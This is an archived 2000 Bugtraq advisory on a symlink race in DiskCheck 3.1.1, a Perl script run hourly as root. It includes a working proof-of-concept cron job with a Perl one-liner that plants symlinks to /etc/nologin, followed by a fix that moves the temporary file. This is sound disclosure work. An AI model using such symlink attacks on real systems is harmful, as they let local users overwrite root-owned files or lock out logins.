[16098] in bugtraq
Diskcheck 3.1.1 Symlink Vulnerability
daemon@ATHENA.MIT.EDU (You, Jin-Ho)
Mon Aug 7 03:55:28 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=EUC-KR
Content-Transfer-Encoding: 7bit
Message-Id: <398BD1FD.BAEE3B70@chonnam.chonnam.ac.kr>
Date: Sat, 5 Aug 2000 17:36:13 +0900
Reply-To: "You, Jin-Ho" <jhyou@CHONNAM.CHONNAM.AC.KR>
From: "You, Jin-Ho" <jhyou@CHONNAM.CHONNAM.AC.KR>
To: BUGTRAQ@SECURITYFOCUS.COM
Diskcheck 3.1.1 Symlink Vulnerability
1 Introduction
DiskCheck is a Perl script that monitors how much space is available
on your hard drive. Basically, it checks your drive space every
hour and takes action based on the specifications in the config file
/etc/diskcheck.conf.
DiskCheck 3.1.1 is available from
http://www.kaybee.org/~kirk/html/linux.html and
RedHat Powertools 6.x.
2 Vulnerability
The command, /etc/cron.hourly/diskcheck.pl is executed with root
privilege
every hour. It creates a temporary file, whose default name is
/tmp/diskusagealert.txt.<pid> defined in /etc/diskcheck.conf,
is predictable and is willing to follow symbolic links. This may allow
malicious local users to create or overwrite arbitrarily named files.
3 Exploit
The following cron job creates the file, /etc/nologin.
0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'
4 Solution
Relocate the temporary file into the directory where root only can
create
a file.
Example)
Edit /etc/diskcheck.conf
$tempfile = '/var/local/diskusagealert.txt'
# ls -ld /var/local
drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/
You, Jin-Ho, jhyou@chonnam.ac.kr
